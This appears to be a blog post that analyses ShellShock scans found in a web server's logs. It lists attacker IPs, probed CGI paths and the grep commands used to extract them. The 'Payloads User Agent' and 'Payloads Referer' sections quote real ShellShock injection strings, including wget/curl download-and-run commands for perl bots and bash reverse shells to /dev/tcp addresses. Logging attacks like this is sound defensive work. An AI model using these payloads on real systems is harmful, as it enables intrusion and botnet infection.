ShellShock Scans (Update)

A little grep'ing through logs reveal the following scan patterns (red: October):

Source IPs:

146.71.113.194
188.138.33.11
192.210.219.20
192.227.213.66
198.20.69.74
207.240.10.33
209.126.230.72
37.59.196.199
46.105.14.134
54.251.83.67
64.15.147.111
64.251.176.240
84.200.228.109
89.207.135.125

Page Requests:

GET /admin.cgi HTTP/1.1
GET //cgi-bin/bash HTTP/1.0
GET /cgi-bin/bash HTTP/1.0
GET /cgi-bin/hello HTTP/1.1
GET /cgi-bin/helpme HTTP/1.0
GET /cgi-bin/info.sh HTTP/1.0
GET /cgi-bin/php5-cli? HTTP/1.1
GET /cgi-bin/php5? HTTP/1.1
GET /cgi-bin/php.fcgi HTTP/1.0
GET /cgi-bin/php? HTTP/1.1
GET /cgi-bin-sdb/printenv HTTP/1.1
GET /cgi-bin/test-cgi HTTP/1.1
GET /cgi-bin/test.cgi HTTP/1.1
GET /cgi-bin/test.sh HTTP/1.0
GET /cgi-mod/index.cgi HTTP/1.1
GET /cgi-sys/defaultwebpage.cgi HTTP/1.0
GET /cgi-sys/defaultwebpage.cgi HTTP/1.1
GET /cgi-sys/entropysearch.cgi HTTP/1.1
GET /cgi-sys/guestbook.cgi HTTP/1.0
GET /cgi-sys/php5? HTTP/1.1
GET / HTTP/1.0
GET / HTTP/1.1
GET /phppath/cgi_wrapper? HTTP/1.1
GET /phppath/php? HTTP/1.1
GET /tmUnblock.cgi HTTP/1.1 
GET /cgi-bin/contact.cgi HTTP/1.1
GET /cgi-bin/defaultwebpage.cgi HTTP/1.1
GET /cgi-bin/env.cgi HTTP/1.1
GET /cgi-bin/forum.cgi HTTP/1.1
GET /cgi-bin/hello.cgi HTTP/1.1
GET /cgi-bin/index.cgi HTTP/1.1
GET /cgi-bin/login.cgi HTTP/1.1
GET /cgi-bin/main.cgi HTTP/1.1
GET /cgi-bin/meme.cgi HTTP/1.1
GET /cgi-bin/recent.cgi HTTP/1.1
GET /cgi-bin/sat-ir-web.pl HTTP/1.1
GET /cgi-bin-sdb/printenv HTTP/1.1
GET /cgi-bin/signon.cgi HTTP/1.1
GET /cgi-bin/test-cgi.pl HTTP/1.1
GET /cgi-bin/test.sh HTTP/1.1
GET /cgi-bin/tools/tools.pl HTTP/1.1
GET /cgi-mod/index.cgi HTTP/1.1
GET /cgi-sys/defaultwebpage.cgi HTTP/1.0
GET /cgi-sys/defaultwebpage.cgi HTTP/1.1
GET /cgi-sys/entropysearch.cgi HTTP/1.1
GET / HTTP/1.1
GET /phppath/cgi_wrapper HTTP/1.1
GET /phppath/php HTTP/1.1

Payloads Referer:

() { :; }; /bin/ping -c 1 104.131.0.69
() { :; }; ping -c 11 209.126.230.74
() { :; }; ping -c 11 216.75.60.74

Payloads User Agent:

() { :;}; /bin/bash -c \"cd /tmp;wget http://213.5.67.223/jurat;curl -O /tmp/jurat http://213.5.67.223/jurat ; perl /tmp/jurat*;rm -rf /tmp/jurat\""
() { :;}; /bin/bash -c \"echo testing9123123\"; /bin/uname -a"
() { :;}; /bin/bash -c \"wget http://217.12.204.127/bin\""
() { :;}; /bin/bash -c \"wget http://ellrich.com/legend.txt -O /tmp/.bash;killall -9 perl;perl /tmp/.bash\""
() { :;}; /bin/bash -c \"wget http://legendsoftwares.com/legend.txt -O /tmp/.apache;killall -9 perl;perl /tmp/.apache;rm -rf /tmp/.apache\""
() { :;}; /bin/bash -c \"wget -O /var/tmp/ec.z test.john-neil.com/ec.z;chmod +x /var/tmp/ec.z;/var/tmp/ec.z;rm -rf /var/tmp/ec.z*\""
() { :; }; /bin/ping -c 1 104.131.0.69"
() { :;}; /bin/ping -c 1 198.101.206.138"
() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://94.102.63.238/shell.pl -O /tmp/bot.pl;perl /tmp/bot.pl;rm -rf /tmp/bot.pl\");'"
() { :;}; /bin/bash -c \"wget -O /var/tmp/muie.png actualproduce.com/js/nice.png;perl /var/tmp/muie.png\""
() { :;}; echo('VULNZZ');system('wget http://82.165.37.214/android.txt -O /tmp/bot.pl;perl /tmp/bot.pl;rm -rf /tmp/bot.pl');"
() { ignored;};/bin/bash -i >& /dev/tcp/104.192.0.18/8888 0>&1"
() { ignored;};/bin/bash -i >& /dev/tcp/207.240.10.1/8888 0>&1"
() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nVULNZZZ!\";system(\"wget http://82.165.37.214/android.txt -O /tmp/bot.pl;perl /tmp/bot.pl;rm -rf /tmp/bot.pl\");'"

Commands used for grep'ing:

Source IPs:

grep -e "( *)" *-access.log* | cut -d ":" -f 2- | cut -d " " -f 1 | sort -u

Page Requests:

grep -e "( *)" *-access.log* | cut -d ":" -f 2- | cut -d '"' -f 2 | sort -u

Payloads Referer:

grep -e "( *)" *-access.log* | cut -d ":" -f 2- | cut -d '"' -f 4 | grep -v "^-$" | sort -u

Payloads User Agent:

grep -e "( *)" *-access.log* | cut -d ":" -f 2- | cut -d '"' -f 6- | grep -e "( *)" | sort -u

 

Comments are closed. Please use contact page to get in touch.